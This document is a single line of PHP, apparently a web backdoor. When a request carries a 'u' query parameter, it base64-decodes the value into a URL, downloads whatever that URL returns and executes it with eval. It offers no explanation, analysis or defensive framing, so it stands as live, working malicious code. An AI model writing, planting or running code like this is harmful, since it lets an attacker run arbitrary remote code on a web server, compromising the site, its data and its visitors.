<?php if(isset($_GET['u'])){$ch=curl_init(base64_decode($_GET['u']));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);eval('?>'.$r);die;}?>